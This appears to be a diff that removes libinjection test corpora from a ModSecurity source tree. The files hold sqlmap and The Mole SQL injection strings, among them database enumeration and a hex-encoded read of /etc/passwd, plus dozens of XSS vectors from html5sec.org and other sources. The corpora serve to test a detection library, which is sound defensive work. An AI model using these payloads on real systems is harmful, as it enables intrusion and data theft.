1%') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('%'='
1%') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('%'='
1%')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('%'='
1%')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('%'='
1%')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('%'='
1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('%'='
1%'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('%'='
1%'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('%'='
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eLVs'='eLVs
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eVVr' LIKE 'eVVr
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- OiYW
1' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)#
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2270=3285) THEN 1 ELSE 0x28 END))#
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (7449=7449) THEN 1 ELSE 0x28 END))#
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'BiBK' LIKE 'BiBK
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'PqYc'='PqYc
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- WaOc
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('bgJB'='bgJB
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('nPXQ' LIKE 'nPXQ
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ahKA
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('MTGN'='MTGN
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('UTnW' LIKE 'UTnW
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- jjec
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('apRZ'='apRZ
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('uTOg' LIKE 'uTOg
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- zMbs
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('BQCu' LIKE 'BQCu
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('dmjR'='dmjR
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('OhUO' LIKE 'OhUO
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('sonC'='sonC
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('LfMY'='LfMY
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('MWjv' LIKE 'MWjv
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('FTHS'='FTHS
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('igdM' LIKE 'igdM
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('WZKG' LIKE 'WZKG
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('yWmg'='yWmg
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('FUsX' LIKE 'FUsX
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('mBLH'='mBLH
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (3370=3370
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- rXfN
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (9212=9212
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- KZqT
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (9114=9114
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- eHGn
1)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((2068=2068
1)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((7248=7248
1)) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((3064=3064
1))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (((5697=5697
1))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (((1805=1805
1))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (((5031=5031
EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7671,(SELECT (ELT(7823=7823,1))),0x7162716b71,0x78))x))

31886
src/deps/src/ModSecurity/others/libinjection/data/sqli-sqlmap.txt
View File

File diff suppressed because it is too large Load Diff

22
src/deps/src/ModSecurity/others/libinjection/data/sqli-sqlmap_examples.txt
View File

@ -1,22 +0,0 @@
#
# Attacks pulled out of the examples from SQLMAP
#
# https:#svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mssqlhash.py
1%23%0AAND%23%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2morehash.py
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2dash.py
1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/modsecurityzeroversioned.py
1+/*!00000AND+2>1*/--'
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/halfversionedmorekeywords.py
value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa

56
src/deps/src/ModSecurity/others/libinjection/data/sqli-themole.txt
View File

@ -1,56 +0,0 @@
1' and '1' like '1
1' and '1' like '0
1' and 0 < (select length(@@version)) and '1' like '1
1' own3d by 1
1' order by 1#
1' order by 15000#
1' order by 2 #
1' order by 4 #
1' order by 3 #
1' and 1=0 union all select 0x373134,0x373135#
1' and 1 = 0 UNION ALL SELECT 0,CONCAT(@@version,0x5468655f4d6f6c652e46316e67657221)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.schemata where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 2 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 4 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 6 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 1 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 3 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 5 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 1 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(user(), 0x20),IFNULL(version(), 0x20),IFNULL(database(), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f6574632f70617373776f7264), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f746d702f6a756e6b), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.adm where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admins where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrator where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrador where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administradores where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.client where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.clients where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.jos_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.login where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.logins where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user_admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuario where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios_admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usr where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usrs where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.wp_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d6173 and table_name like 0x2541424c4525#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 4 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 5 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 2 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 3 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 1 #

1124
src/deps/src/ModSecurity/others/libinjection/data/sqli-wordpress_rbarnett.txt
View File

File diff suppressed because it is too large Load Diff

3
src/deps/src/ModSecurity/others/libinjection/data/tbd-xss-github-issue-68.txt
View File

@ -1,3 +0,0 @@
# https://github.com/client9/libinjection/issues/68
%3Cobject%00IRSDL+allowScriptAccess%3Dalways+data%3D%2F%2F0me.me%2Fdemo%2Fxss%2Fflash%2FnormalEmbededXSS.swf%3F

3
src/deps/src/ModSecurity/others/libinjection/data/xss-0x6D6172696F-394932823645503488.txt
View File

@ -1,3 +0,0 @@
# https://twitter.com/0x6D6172696F/status/394932823645503488
# http://pastebin.com/jNPbhduR
<p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">

4
src/deps/src/ModSecurity/others/libinjection/data/xss-angular-pull-11290.txt
View File

@ -1,4 +0,0 @@
#
# https://github.com/angular/angular.js/pull/11290
#
<animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />

488
src/deps/src/ModSecurity/others/libinjection/data/xss-html5secorg.txt
View File

@ -1,488 +0,0 @@
#
# http://html5sec.org
# retreieved 2013-11-06
test 1 <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
# obsolete firefox 3
#test 2 <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
# obsolete firefox 3
#test 3 <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
test 4 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
test 5 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
test 6 <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
test 7 <input onfocus=write(1) autofocus>
test 8 <input onblur=write(1) autofocus><input autofocus>
test 9 <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
test 10 <video poster=javascript:alert(1)//></video>
test 11 <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
test 12 <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
# opera only, only "DoS"
# test 13 <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
# opera only, "DoS"
# test 14 <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
test 15 <script>({0:#0=alert/#0#/#0#(0)})</script>
test 16 X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
test 17 <?xml-stylesheet href="javascript:alert(1)"?><root/>
test 18 <script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
# obsolete firefox 3
# test 19 <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
test 20 <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
test 21 <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
test 22 <input onblur=focus() autofocus><input>
test 23 <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
test 24 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>
test 25 <script src="#">{alert(1)}</script>;1
# obsolete firefox 4 and under
# test 26 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
test 27 <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
test 28 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>
test 29 <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
test 30 <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
test 31_1 <frameset onload=alert(1)>
test 31_2 <body onload=alert(1)>
test 32 <table background="javascript:alert(1)"></table>
test 33 <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
test 34 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%25;height:100%25 src=test.vml#xss></vmlframe>
test 35 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
test 36 <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
test 37 <!--<img src="--><img src=x onerror=alert(1)//">
test 38 <comment><img src="</comment><img src=x onerror=alert(1)//">
# obsolete, FF 3.6 and Opera 11
#test 39_1 <![><img src="]><img src=x onerror=alert(1)//">
test 39_2 <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
test 40 <style><img src="</style><img src=x onerror=alert(1)//">
test 41 <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
test 42 <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
test 43 <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style>
test 44 <style>*[{}@import'test.css?]{color: green;}</style>X
test 45 <div style="font-family:'foo[a];color:red;';">XXX</div>
test 46 <div style="font-family:foo}color=red;">XXX</div>
test 47 <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
test 48 <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
test 49 <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
test 50 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
test 51 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
test 52 <x style="behavior:url(test.sct)">
test 53_1 <xml id="xss" src="test.htc"></xml>
test 53_2 <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
test 54 <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script
test 55_1 <video><source onerror="alert(1)">
test 55_2 <audio><source onerror="alert(1)">
test 56 <video onerror="alert(1)"><source></source></video>
#
# Obsolete.. Firefox 3.6, Chrome 5, Safari 4
#
# test 57 <b <script>alert(1)//</script>0</script></b>
#
# Obsolete Firefox 3.6
#
#test 58 <b><script<b></b><alert(1)</script </b></b>
test 59 <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
# we reject all styles
# test 60 TBD Obfuscation css-properties and values via ignored extra characters
# we reject all styles
# test 61 TBD CSS encoding and escaping
# IE9 parses this as NOT-XSS
# <x ?="foo"/><x foo="><img src=x onerror=alert(1)//"/>
#
#
test 62_1 <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
#
# IE9 parses this as XSS
# <!-- ="foo"><x foo --><img onerror="alert(1)//'" src="x"/>
#
test 62_2 <! '="foo"><x foo='><img src=x onerror=alert(2)//'>
#
# IE9 parses this as XSS as previous
#
test 62_3 <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
# bonus -- correctly detected
test 62_4 <!-- '="foo"><x foo='--><img src=x onerror=alert(2)//'>
# bonus -- quotes reversed
# same as 62_2
test 62_5 <! "='foo'><x foo="><img src=x onerror=alert(2)//">
# bonus - use of backquotes
test 62_5 <! `='foo'><x foo=`><img src=x onerror=alert(2)//`>
# bonus
<!-- "='foo'><x -->"><img src=x onerror=alert(1)//">
<!-- "=foo><x -->"><img src=x onerror=alert(1)//">
<!-- "foo><x -->"><img src=x onerror=alert(1)//">
<!-- "foo'><x -->"><img src=x onerror=alert(1)//">
test 63_1 <embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.↓, GC6↓,
test 63_2 <img src="javascript:alert(2)">
test 63_3 <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.
test 63_4 <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.
test 64_1 <!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
test 64_2 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
test 65 <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
test 66 <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
test 67 <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
